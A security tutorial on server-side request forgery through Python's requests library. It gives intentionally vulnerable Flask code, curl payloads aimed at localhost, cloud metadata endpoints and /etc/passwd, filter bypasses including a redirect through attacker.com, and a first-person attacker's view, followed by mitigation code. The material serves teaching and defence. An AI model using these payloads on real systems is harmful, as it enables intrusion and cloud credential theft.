Python Requests Library SSRF via URL Parsing
The requests library is the de facto standard for making HTTP requests in Python. It provides a simple and elegant API for interacting with web services, APIs, and remote resources.
When applications use requests to fetch URLs provided by users, they become susceptible to Server-Side Request Forgery (SSRF) attacks. The risk is amplified by URL parsing inconsistencies between the validator and the HTTP client, and by the fact that requests.get() follows redirects by default.
While requests itself is not inherently vulnerable, improper validation of user-supplied URLs before passing them to requests.get() or similar methods allows attackers to make the server send requests to unintended destinations.
The Vulnerability
Consider an application that fetches and displays content from user-provided URLs:
from flask import Flask, request, jsonify
import requests

app = Flask(__name__)

@app.route('/fetch')
def fetch_url():
    url = request.args.get('url')
    if not url:
        return jsonify({"error": "URL parameter required"}), 400
    # Vulnerable: no validation of user-supplied URL
    try:
        response = requests.get(url, timeout=5)
        return jsonify({
            "status_code": response.status_code,
            "content": response.text[:1000]
        })
    except Exception as e:
        return jsonify({"error": str(e)}), 500

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)
The application directly passes the user-controlled url parameter to requests.get() without any validation:
response = requests.get(url, timeout=5)
This allows attackers to make the server send requests to arbitrary destinations.
Exploitation
An attacker can target internal services that are not accessible from the internet:
# Access internal services
curl "http://target:5000/fetch?url=http://localhost:8080/admin"
curl "http://target:5000/fetch?url=http://127.0.0.1:6379/" # Redis
curl "http://target:5000/fetch?url=http://192.168.1.1/admin" # Internal network
# Access cloud metadata endpoints
curl "http://target:5000/fetch?url=http://169.254.169.254/latest/meta-data/" # AWS
curl "http://target:5000/fetch?url=http://metadata.google.internal/computeMetadata/v1/" # GCP
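Out of the box, requests only ships connection adapters for http:// and https://, so a file:// URL raises InvalidSchema. If the application mounts a file adapter on its session (for example through the third-party requests-file package) or falls back to another client such as urllib for other schemes, the same endpoint can be used to read local files:
# Read local files via file:// scheme (only works when a file:// adapter is mounted)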
curl "http://target:5000/fetch?url=file:///etc/passwd"
curl "http://target:5000/fetch?url=file:///proc/self/environ"
URL Parsing Bypass Techniques
Even when basic validation is implemented, attackers can use URL parsing inconsistencies to bypass filters:
# Weak validation that can be bypassed
def is_safe_url(url):
    blocked = ['localhost', '127.0.0.1', '169.254.169.254']
    return not any(blocked_host in url.lower() for blocked_host in blocked)
Bypass techniques:
# Decimal IP representation
curl "http://target:5000/fetch?url=http://2130706433/" # 127.0.0.1 as decimal
# IPv6 representations
curl "http://target:5000/fetch?url=http://[::1]/" # localhost
curl "http://target:5000/fetch?url=http://[0:0:0:0:0:0:0:1]/"
# URL encoding
curl "http://target:5000/fetch?url=http://%31%32%37%2e%30%2e%30%2e%31/"
# Public DNS name that resolves to an internal IP (an attacker-controlled domain works the same way)
curl "http://target:5000/fetch?url=http://localtest.me/" # Resolves to 127.0.0.1
# Redirect bypass (if following redirects)
curl "http://target:5000/fetch?url=http://attacker.com/redirect?to=http://localhost/"
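To see why substring matching fails, the following minimal sketch runs the weak is_safe_url check shown earlier against a few of the bypass URLs, then shows that the decimal host is the loopback address once it is read as an integer. It makes no network requests, and the URL list is only illustrative.

```python
import ipaddress

BLOCKED = ["localhost", "127.0.0.1", "169.254.169.254"]


def is_safe_url(url: str) -> bool:
    """The weak substring blocklist from the section above."""
    return not any(host in url.lower() for host in BLOCKED)


# A few of the bypass URLs listed above; none contains a blocked substring.
bypasses = [
    "http://2130706433/",
    "http://[::1]/",
    "http://[0:0:0:0:0:0:0:1]/",
    "http://localtest.me/",
]

for url in bypasses:
    print(url, "->", "allowed" if is_safe_url(url) else "blocked")

# The decimal host is 127.0.0.1 written as a single 32-bit integer.
decoded = ipaddress.ip_address(2130706433)
print(decoded, decoded.is_loopback)
```

Every URL in the list passes the filter, which is why the check has to run on the resolved address rather than on the raw string.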
Vulnerable Patterns with requests Library
# Pattern 1: Direct URL usage
requests.get(user_url)
# Pattern 2: URL construction without validation
base_url = "http://api.internal/"
requests.get(base_url + user_path) # Path traversal possible
# Pattern 3: Following redirects to internal hosts
requests.get(user_url, allow_redirects=True)
# Pattern 4: Using user input in headers
requests.get(url, headers={"Host": user_input}) # Host header injection
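For Pattern 2, one way to keep user input from climbing out of the intended path is to treat it as a single path segment and percent-encode it before appending it to the base URL. This is a minimal sketch under that assumption: build_api_url is a hypothetical helper, and it presumes the upstream API expects exactly one segment after the base and does not decode %2F back into a slash.

```python
from urllib.parse import quote

BASE_URL = "http://api.internal/"  # base URL from Pattern 2 above


def build_api_url(user_segment: str) -> str:
    """Hypothetical helper: append user input as one encoded path segment."""
    if user_segment in ("", ".", ".."):
        raise ValueError("invalid path segment")
    # safe="" also encodes "/", "?" and "#", so the input cannot add
    # extra path segments, a query string, or a fragment.
    return BASE_URL + quote(user_segment, safe="")


print(build_api_url("reports"))
print(build_api_url("../admin"))
```

With the slash encoded, ../admin stays inside a single segment instead of being interpreted as a parent-directory reference by the client.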
Why requests SSRF matters from an offensive security perspective
I prize SSRF through requests because it turns the server into my proxy to everything it can reach and I cannot. From the outside, the loopback interface, the RFC 1918 ranges, the container’s sidecar, and the cloud metadata service are all invisible to me; once I control the URL, the server fetches them and hands me the bodies. On a cloud host that usually means walking 169.254.169.254 to lift IAM credentials, which is the fastest path from a “harmless” URL fetcher to account compromise. Where the application has mounted a file:// adapter, the same primitive also gives me local file read.
What makes this class durable is that the bug is in validation, not in requests, so it survives naive filters. The tells I hunt for:
- A user-supplied value passed into requests.get/post(...). Webhook senders, URL previews, avatar and image fetchers, PDF and screenshot renderers, and “import from URL” features are the usual carriers.
- Blocklists of hostname strings rather than resolved-IP checks. Substring matching on localhost or 127.0.0.1 is bypassed with decimal IPs, IPv6 [::1], URL encoding, and DNS names that resolve inward.
- allow_redirects=True left at its default. A permitted host that 302s to http://169.254.169.254/ defeats any check done only on the original URL, so I always probe redirect following.
- Validation that resolves DNS once, then fetches separately. That time-of-check gap is DNS rebinding, and I exploit it with a host that answers public on the first lookup and internal on the second.
The defender takeaway: validate after resolution against IP ranges, re-check every redirect hop, and prefer an egress proxy over hostname blocklists. The same primitive is covered from the parsing angle in Server Side Request Forgery (SSRF) in Flask Applications.
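Re-checking every redirect hop can be sketched as a small loop that disables automatic redirect following and validates each Location target before requesting it. This is a sketch, not a definitive implementation: fetch_checked is a hypothetical name, is_safe stands for whatever URL validator the application uses, and get is expected to behave like requests.get (both are passed in so the loop does not depend on a particular validator).

```python
from urllib.parse import urljoin

REDIRECT_CODES = {301, 302, 303, 307, 308}


def fetch_checked(url, is_safe, get, max_hops=5):
    """Follow redirects by hand, validating every hop before requesting it.

    `is_safe` is any callable that takes a URL and returns a bool.
    `get` is a callable with the calling convention of requests.get.
    """
    for _ in range(max_hops + 1):
        if not is_safe(url):
            raise ValueError(f"blocked URL: {url}")
        response = get(url, timeout=5, allow_redirects=False)
        location = response.headers.get("Location")
        if response.status_code not in REDIRECT_CODES or not location:
            return response
        # Location may be relative, so resolve it against the current URL.
        url = urljoin(url, location)
    raise ValueError("too many redirects")
```

In the Flask handler this would be called as fetch_checked(url, is_safe_url, requests.get). A permitted host that answers with a 302 to http://169.254.169.254/ is then rejected on the second iteration instead of being followed.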
Proof of exploitation
Run the lab app (PyFuLabs/flask-fu/flask-requests-ssrf). The url parameter is handed straight to requests.get, so the server fetches whatever the client names, including loopback addresses it should never reach:
curl -sG "http://pyfu.local/flask-fu/flask-requests-ssrf/fetch" \
--data-urlencode "url=http://127.0.0.1:5000/"
{
"content": "<!doctype html>\n<html lang=en>\n<title>404 Not Found</title>\n<h1>Not Found</h1>..."
}
The response body is whatever the internal listener returned, confirming the request originated server-side at 127.0.0.1 rather than from the client.
Mitigation
Validate the URL with a real parser, allow only the http and https schemes, resolve the hostname, and reject any address that falls in a blocked IP range:
from flask import Flask, request, jsonify
from urllib.parse import urlparse
import requests
import ipaddress
import socket

app = Flask(__name__)

ALLOWED_SCHEMES = ['http', 'https']
BLOCKED_HOSTS = ['localhost', '127.0.0.1', '0.0.0.0']
BLOCKED_NETWORKS = [
    ipaddress.ip_network('0.0.0.0/8'),  # hosts such as "0" resolve to 0.0.0.0
    ipaddress.ip_network('127.0.0.0/8'),
    ipaddress.ip_network('10.0.0.0/8'),
    ipaddress.ip_network('172.16.0.0/12'),
    ipaddress.ip_network('192.168.0.0/16'),
    ipaddress.ip_network('169.254.0.0/16'),
]

def is_safe_url(url: str) -> bool:
    try:
        parsed = urlparse(url)
        # Check scheme
        if parsed.scheme not in ALLOWED_SCHEMES:
            return False
        # Check for blocked hostnames
        hostname = parsed.hostname
        if not hostname or hostname in BLOCKED_HOSTS:
            return False
        # Resolve hostname and check IP.
        # Note: gethostbyname is IPv4-only, so a host that also has an
        # AAAA record is only checked on its A record.
        ip = socket.gethostbyname(hostname)
        ip_obj = ipaddress.ip_address(ip)
        for network in BLOCKED_NETWORKS:
            if ip_obj in network:
                return False
        return True
    except Exception:
        return False

@app.route('/fetch')
def fetch_url():
    url = request.args.get('url')
    if not url or not is_safe_url(url):
        return jsonify({"error": "Invalid or blocked URL"}), 400
    try:
        # requests resolves the hostname again here, so a DNS rebinding
        # gap remains between the check above and this fetch.
        response = requests.get(url, timeout=5, allow_redirects=False)
        return jsonify({
            "status_code": response.status_code,
            "content": response.text[:1000]
        })
    except Exception as e:
        return jsonify({"error": str(e)}), 500
Key mitigations:
- Validate URL scheme (only allow http and https)
- Resolve hostnames and check against blocked IP ranges
- Disable redirect following or validate redirect targets
- Use allowlists for permitted domains when possible
- Set timeouts so that slow or unresponsive targets cannot tie up server workers
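As a variation on the resolved-IP check, the sketch below inspects every address the hostname resolves to, IPv4 and IPv6 alike, and accepts the URL only if all of them are globally routable according to the standard library's ipaddress module. The names is_public_url and resolved_addresses are hypothetical, and the sketch does not close the DNS rebinding gap, because the HTTP client still resolves the name again when it connects.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def resolved_addresses(hostname: str) -> set:
    """Return every IPv4/IPv6 address the resolver reports for hostname."""
    infos = socket.getaddrinfo(hostname, None, proto=socket.IPPROTO_TCP)
    # sockaddr[0] is the address; drop any IPv6 scope suffix such as "%eth0".
    return {info[4][0].split("%")[0] for info in infos}


def is_public_url(url: str) -> bool:
    """Hypothetical validator: http(s) only, and every resolved IP is global."""
    try:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            return False
        addresses = resolved_addresses(parts.hostname)
    except (ValueError, OSError):
        # Malformed URL or failed resolution: fail closed.
        return False
    return bool(addresses) and all(
        ipaddress.ip_address(addr).is_global for addr in addresses
    )


for candidate in ("http://127.0.0.1/", "http://169.254.169.254/", "file:///etc/passwd"):
    print(candidate, "->", is_public_url(candidate))
```

Relying on is_global rather than a hand-written network list also covers loopback, link-local, and private ranges for IPv6, at the cost of depending on how the running Python version classifies special-purpose ranges.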